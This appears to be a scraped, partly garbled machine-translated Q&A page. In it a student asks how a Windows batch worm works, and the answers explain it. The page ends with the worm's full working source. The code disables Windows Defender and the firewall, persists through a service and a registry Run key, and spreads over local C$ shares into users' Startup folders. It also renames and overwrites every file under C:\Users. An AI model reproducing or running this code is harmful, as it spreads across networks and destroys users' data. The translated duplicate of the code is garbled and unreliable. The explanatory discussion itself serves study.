Batch file 这是怎么回事;批量蠕虫“;作品 @echo关闭 集合i=0 设置“NomeProcesso=DaMonki.exe” 设置“NomeService=DaMonki” 雷姆 echo sc创建%NomeService%binpath=%0>service.bat echo sc start%NomeService%>>service.bat attrib+h+r+s service.bat 启动service.bat 雷姆 reg添加“HKEY_当前用户\软件\ Microsoft\Windows\CurrentVersion\Run”/v“Windows服务”/t“reg_SZ”/d%0 属性+h+r+s%0 雷姆 网络停止“Windows Defender服务” net停止“Windows防火墙” 雷姆 :蠕虫 net use Z:\\192.168.1.%i%\C$ 如果存在Z:('dir Z:\Users/b')中的/f%%u,请复制%0“Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe” mountvol Z:/d) 如果%i%==256(转到感染)其他(设置/a i=i+1) 跳虫 雷姆 :感染 对于/f%%f in('dir C:\Users\*.*/s/b'),请执行(重命名%%f*.bat) 对于/f%%f in('dir C:\Users\*.bat/s/b'),请执行(复制%0%%f)
我正在为我的TCC研究恶意软件和恶意程序,我发现了这个批处理蠕虫示例,我可以理解大部分代码,但我无法理解C:\Users中的Batch file 这是怎么回事;批量蠕虫“;作品 @echo关闭 集合i=0 设置“NomeProcesso=DaMonki.exe” 设置“NomeService=DaMonki” 雷姆 echo sc创建%NomeService%binpath=%0>service.bat echo sc start%NomeService%>>service.bat attrib+h+r+s service.bat 启动service.bat 雷姆 reg添加“HKEY_当前用户\软件\ Microsoft\Windows\CurrentVersion\Run”/v“Windows服务”/t“reg_SZ”/d%0 属性+h+r+s%0 雷姆 网络停止“Windows Defender服务” net停止“Windows防火墙” 雷姆 :蠕虫 net use Z:\\192.168.1.%i%\C$ 如果存在Z:('dir Z:\Users/b')中的/f%%u,请复制%0“Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe” mountvol Z:/d) 如果%i%==256(转到感染)其他(设置/a i=i+1) 跳虫 雷姆 :感染 对于/f%%f in('dir C:\Users\*.*/s/b'),请执行(重命名%%f*.bat) 对于/f%%f in('dir C:\Users\*.bat/s/b'),请执行(复制%0%%f),batch-file,malware,Batch File,Malware,我正在为我的TCC研究恶意软件和恶意程序,我发现了这个批处理蠕虫示例,我可以理解大部分代码,但我无法理解C:\Users中的“感染网络”和“感染*” 这些线路对我的电脑有什么作用?它只会“感染”这些文件,还是会毁掉它们?此蠕虫将仅在受害者网络中传播?这个代码有什么限制?杀毒软件如何阻止它 如果你有一些好的恶意软件/软件工程电子书和论文,请在评论中留下链接 对不起,我说得不好,我的这门语言不流利 不要使用带有恶意意图的代码“感染网络”部分尝试获得与本地网络IP地址的网络使用连接,读取系统中的用户列
“感染网络”和“感染*”
这些线路对我的电脑有什么作用?它只会“感染”这些文件,还是会毁掉它们?此蠕虫将仅在受害者网络中传播?这个代码有什么限制?杀毒软件如何阻止它
如果你有一些好的恶意软件/软件工程电子书和论文,请在评论中留下链接
对不起,我说得不好,我的这门语言不流利
不要使用带有恶意意图的代码“感染网络”部分尝试获得与本地网络IP地址的网络使用连接,读取系统中的用户列表,并将文件复制到其本地启动目录中,以便在用户登录到其计算机时运行
“感染用户”部分正在将用户目录中的几个文件重命名为.bat扩展名,然后以该名称复制另一个文件。这意味着几个文件被强制具有所需.bat文件的内容。它可能运行其他恶意代码或运行先前复制的可执行文件
如果您需要进一步的澄清,请告诉我。。意味着感染C:\users profile中的所有用户。顺便说一句,使用set命令(set Process=DaMonki),您可以将“DaMonki”更改为其他任何内容。批处理将自身添加到您的注册表中,以便在系统启动时启动,并将自身填充到每个用户的“开始”菜单中,以便在用户登录时运行,然后尝试对本地网络中的每台机器执行相同的操作。这解决了我的疑问,但是,那些被迫包含bat内容的文件不再工作了?他们现在是一个“新项目”?是的。他们不再工作了。它们被重命名为.bat扩展名。然后,一个新的批处理文件被复制到每个批处理文件的内容中,用隐藏的新内容替换它们的原始意图。不知道为什么它需要两个步骤才能做到这一点,但这似乎就是它要做的。不客气:)代码本质上是安装一个虚假服务,禁用Windows安全检查,复制各种可执行文件和批处理文件,尽可能地将蠕虫的内容推送到网络上。很抱歉再次打扰您!我知道这很烦人,但我不想对同一个代码提出新的问题,所以如果你不介意的话:有没有什么方法可以在不影响计算机的情况下做到这一点?怎么用?它只会感染用户
目录或子文件夹?你的意思是,“有没有办法禁用批处理文件的有害部分?”?如果是,那么是的。只要在任何有害的行前面加上“REM”或“:”,就可以把它们注释掉。如果它已经运行了,那么您必须检查正常的在线通道,以获得针对该特定蠕虫的纠正方案。
@echo off
SET i=0
SET "NomeProcesso=DaMonki.exe"
SET "NomeService=DaMonki"
rem <=== run as service ===>
echo sc create %NomeService% binpath=%0 > service.bat
echo sc start %NomeService% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== startup registry ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== kill firewall and windows defender ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== INFECT NETWORK!!! ===>
:Worm
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto Worm
rem <=== infect *.* in C:\Users ===>
:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)